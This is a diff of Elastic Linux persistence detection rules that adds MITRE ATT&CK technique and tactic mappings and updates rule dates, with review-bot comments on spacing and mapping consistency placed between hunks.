 creation_date = "2024/06/03"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -145,6 +145,16 @@ id = "T1053.003"
 name = "Cron"
 reference = "https://attack.mitre.org/techniques/T1053/003/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.017"
+name = "Udev Rules"
+reference = "https://attack.mitre.org/techniques/T1546/017/"
+
 [[rule.threat.technique]]
 id = "T1547"
 name = "Boot or Logon Autostart Execution"
@@ -159,3 +169,21 @@ reference = "https://attack.mitre.org/techniques/T1547/013/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1222"
+name = "File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml
index 412be59834c..1f659ab84ca 100644
--- a/rules/linux/persistence_process_capability_set_via_setcap.toml
+++ b/rules/linux/persistence_process_capability_set_via_setcap.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/03"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -118,7 +118,25 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml
index 8492cf01914..21e54dfa5cb 100644
--- a/rules/linux/persistence_pth_file_creation.toml
+++ b/rules/linux/persistence_pth_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -162,6 +162,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -174,3 +179,21 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.018"
+name = "Python Startup Hooks"
+reference = "https://attack.mitre.org/techniques/T1546/018/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_rc_local_error_via_syslog.toml b/rules/linux/persistence_rc_local_error_via_syslog.toml
index 22cdd76e5c8..a40049fd64c 100644
--- a/rules/linux/persistence_rc_local_error_via_syslog.toml
+++ b/rules/linux/persistence_rc_local_error_via_syslog.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -112,3 +112,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_rc_local_service_already_running.toml b/rules/linux/persistence_rc_local_service_already_running.toml
index c1a07ece724..3b6c833d850 100644
--- a/rules/linux/persistence_rc_local_service_already_running.toml
+++ b/rules/linux/persistence_rc_local_service_already_running.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -119,3 +119,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_rc_script_creation.toml b/rules/linux/persistence_rc_script_creation.toml
index 1ae06027c94..a8625182815 100644
--- a/rules/linux/persistence_rc_script_creation.toml
+++ b/rules/linux/persistence_rc_script_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/28"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -183,3 +183,21 @@ reference = "https://attack.mitre.org/techniques/T1037/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1037.004"
+name = "RC Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/004/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml
index 7dccbc4c3f0..253e96e34ee 100644
--- a/rules/linux/persistence_setuid_setgid_capability_set.toml
+++ b/rules/linux/persistence_setuid_setgid_capability_set.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/05"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -182,3 +182,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/"
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_shadow_file_modification.toml b/rules/linux/persistence_shadow_file_modification.toml
index 61af8e00f9c..e488d7b6bb4 100644
--- a/rules/linux/persistence_shadow_file_modification.toml
+++ b/rules/linux/persistence_shadow_file_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/05"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -116,6 +116,16 @@ id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique]]
+id = "T1136"
+name = "Create Account"
+reference = "https://attack.mitre.org/techniques/T1136/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1136.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1136/001/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml
index da1bfc93904..372e352f546 100644
--- a/rules/linux/persistence_shared_object_creation.toml
+++ b/rules/linux/persistence_shared_object_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -205,6 +205,41 @@ id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["file.name", "process.name"]
diff --git a/rules/linux/persistence_shell_configuration_modification.toml b/rules/linux/persistence_shell_configuration_modification.toml
index 4fe83655166..36feba16bed 100644
--- a/rules/linux/persistence_shell_configuration_modification.toml
+++ b/rules/linux/persistence_shell_configuration_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
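Review bot: The two `[[rule.threat]]` blocks appended in the persistence_shared_object_creation.toml hunk (`@@ -205,6 +205,41 @@`) leave one seam without a blank separator: the old side has exactly one blank line between `reference = ".../TA0003/"` and `[rule.new_terms]`, and the 35 added lines start with `+[[rule.threat]]` and end with `+reference = ".../TA0004/"` rather than a blank `+` line, so in the new file either the first `[[rule.threat]]` header directly follows the Persistence tactic's `reference` or the Privilege Escalation `reference` directly precedes `[rule.new_terms]` (the collapsed rendering hides which). Every other rule in this commit closes an appended block with a blank line. The same pattern appears in the persistence_ssh_via_backdoored_system_user.toml hunk at `@@ -134,6 +139,28 @@` and the persistence_systemd_service_started.toml hunk at `@@ -233,6 +233,23 @@`. A trailing blank line after the last added `reference` in each of the three would make the layout consistent with the rest of the commit.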
@@ -152,3 +152,21 @@ reference = "https://attack.mitre.org/techniques/T1546/004/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.004"
+name = "Unix Shell Configuration Modification"
+reference = "https://attack.mitre.org/techniques/T1546/004/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml
index 11e4f177db0..9594bb68dde 100644
--- a/rules/linux/persistence_simple_web_server_connection_accepted.toml
+++ b/rules/linux/persistence_simple_web_server_connection_accepted.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -106,48 +106,58 @@ sequence by process.entity_id with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Persistence"
- id = "TA0003"
- reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat.technique]]
+id = "T1505"
+name = "Server Software Component"
+reference = "https://attack.mitre.org/techniques/T1505/"
- [[rule.threat.technique]]
- id = "T1505"
- name = "Server Software Component"
- reference = "https://attack.mitre.org/techniques/T1505/"
+[[rule.threat.technique.subtechnique]]
+id = "T1505.003"
+name = "Web Shell"
+reference = "https://attack.mitre.org/techniques/T1505/003/"
- [[rule.threat.technique.subtechnique]]
- id = "T1505.003"
- name = "Web Shell"
- reference = "https://attack.mitre.org/techniques/T1505/003/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Command and Control"
- id = "TA0011"
- reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1071.001"
+name = "Web Protocols"
+reference = "https://attack.mitre.org/techniques/T1071/001/"
- [[rule.threat.technique]]
- name = "Application Layer Protocol"
- id = "T1071"
- reference = "https://attack.mitre.org/techniques/T1071/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/persistence_simple_web_server_creation.toml b/rules/linux/persistence_simple_web_server_creation.toml
index a36dadf7d26..2f6fa07ac43 100644
--- a/rules/linux/persistence_simple_web_server_creation.toml
+++ b/rules/linux/persistence_simple_web_server_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/12/17"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -141,6 +141,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -154,6 +159,11 @@ id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+[[rule.threat.technique.subtechnique]]
+id = "T1071.001"
+name = "Web Protocols"
+reference = "https://attack.mitre.org/techniques/T1071/001/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/persistence_site_and_user_customize_file_creation.toml b/rules/linux/persistence_site_and_user_customize_file_creation.toml
index d0ae0b7eb1f..3bbc6c7402b 100644
--- a/rules/linux/persistence_site_and_user_customize_file_creation.toml
+++ b/rules/linux/persistence_site_and_user_customize_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -153,6 +153,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.006"
+name = "Python"
+reference = "https://attack.mitre.org/techniques/T1059/006/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -165,3 +170,21 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.018"
+name = "Python Startup Hooks"
+reference = "https://attack.mitre.org/techniques/T1546/018/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_ssh_netcon.toml b/rules/linux/persistence_ssh_netcon.toml
index bde9a2bb722..2edd7f1957b 100644
--- a/rules/linux/persistence_ssh_netcon.toml
+++ b/rules/linux/persistence_ssh_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/06"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -146,6 +146,11 @@ reference = "https://attack.mitre.org/tactics/TA0008/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
diff --git a/rules/linux/persistence_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml
index cf09a455608..fae10f1ce11 100644
--- a/rules/linux/persistence_ssh_via_backdoored_system_user.toml
+++ b/rules/linux/persistence_ssh_via_backdoored_system_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/07"
 integration = ["system"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -101,6 +101,16 @@ user.name:(
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.003"
+name = "Local Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/003/"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
@@ -119,11 +129,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [[rule.threat.technique]]
 id = "T1564"
 name = "Hide Artifacts"
@@ -134,6 +139,28 @@ id = "T1564.002"
 name = "Hidden Users"
 reference = "https://attack.mitre.org/techniques/T1564/002/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1078.003"
+name = "Local Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/003/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["user.name", "host.id"]
diff --git a/rules/linux/persistence_suspicious_file_opened_through_editor.toml b/rules/linux/persistence_suspicious_file_opened_through_editor.toml
index a3db7c8cbe3..c78e14b4caf 100644
--- a/rules/linux/persistence_suspicious_file_opened_through_editor.toml
+++ b/rules/linux/persistence_suspicious_file_opened_through_editor.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/25"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -96,56 +96,89 @@ file.path : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1037"
 name = "Boot or Logon Initialization Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1037.004"
 name = "RC Scripts"
 reference = "https://attack.mitre.org/techniques/T1037/004/"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.002"
 name = "Systemd Service"
 reference = "https://attack.mitre.org/techniques/T1543/002/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.004"
+name = "Unix Shell Configuration Modification"
+reference = "https://attack.mitre.org/techniques/T1546/004/"
 [[rule.threat.technique]]
 id = "T1574"
 name = "Hijack Execution Flow"
 reference = "https://attack.mitre.org/techniques/T1574/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1574.006"
 name = "Dynamic Linker Hijacking"
 reference = "https://attack.mitre.org/techniques/T1574/006/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1548.003"
 name = "Sudo and Sudo Caching"
 reference = "https://attack.mitre.org/techniques/T1548/003/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1003.008"
+name = "/etc/passwd and /etc/shadow"
+reference = "https://attack.mitre.org/techniques/T1003/008/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
index 793a712a67b..39876c5dc89 100644
--- a/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
+++ b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -142,3 +142,21 @@ reference = "https://attack.mitre.org/techniques/T1563/001/"
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_systemd_generator_creation.toml b/rules/linux/persistence_systemd_generator_creation.toml
index 1405518b4e7..c652b183d85 100644
--- a/rules/linux/persistence_systemd_generator_creation.toml
+++ b/rules/linux/persistence_systemd_generator_creation.toml
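Review bot: Blank-line spacing in the persistence_suspicious_file_opened_through_editor.toml hunk (`@@ -96,56 +96,89 @@`) ends up uneven: the added `T1098` block and the added `T1546`/`T1546.004` block are not followed by a blank `+` line before the next `[[rule.threat.technique]]` header, whereas every other technique and subtechnique in the same hunk gains a separating blank line through an added `+` line. The collapsed rendering can hide a context blank line, so this is worth confirming against the new file rather than taken as certain. If the seams really are tight, a blank line after `reference = "https://attack.mitre.org/techniques/T1098/"` and after `reference = "https://attack.mitre.org/techniques/T1546/004/"` would make the file read like the other rules in this commit, where each inserted block is closed by a blank line.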
@@ -2,7 +2,7 @@
 creation_date = "2024/06/19"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -138,6 +138,11 @@ id = "T1543.002"
 name = "Systemd Service"
 reference = "https://attack.mitre.org/techniques/T1543/002/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
@@ -156,6 +161,11 @@ id = "T1543.002"
 name = "Systemd Service"
 reference = "https://attack.mitre.org/techniques/T1543/002/"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
diff --git a/rules/linux/persistence_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml
index 3d67cd46113..1df61713b44 100644
--- a/rules/linux/persistence_systemd_netcon.toml
+++ b/rules/linux/persistence_systemd_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/26"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -171,3 +171,16 @@ framework = "MITRE ATT&CK"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_systemd_scheduled_timer_created.toml b/rules/linux/persistence_systemd_scheduled_timer_created.toml
index 03c70b2ad08..ae8ceabfd9a 100644
--- a/rules/linux/persistence_systemd_scheduled_timer_created.toml
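Review bot: In the second persistence_systemd_generator_creation.toml hunk (`@@ -156,6 +161,11 @@`), `T1543.002` Systemd Service stays mapped under the `TA0004` Privilege Escalation tactic alongside the newly added `T1546`, while this same commit deletes the entire `[[rule.threat]]` entry that mapped `T1543`/`T1543.002` to `TA0004` from persistence_systemd_service_creation.toml. The two systemd rules therefore now disagree on whether the same technique implies Privilege Escalation, which is the kind of drift the tactic/technique correlation tests in this PR are meant to catch. If the removal in systemd_service_creation is deliberate, the rationale belongs in the commit message; otherwise the `TA0004` mapping for `T1543.002` should be handled the same way in both rules.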
+++ b/rules/linux/persistence_systemd_scheduled_timer_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/24"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -210,3 +210,21 @@ reference = "https://attack.mitre.org/techniques/T1053/006/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
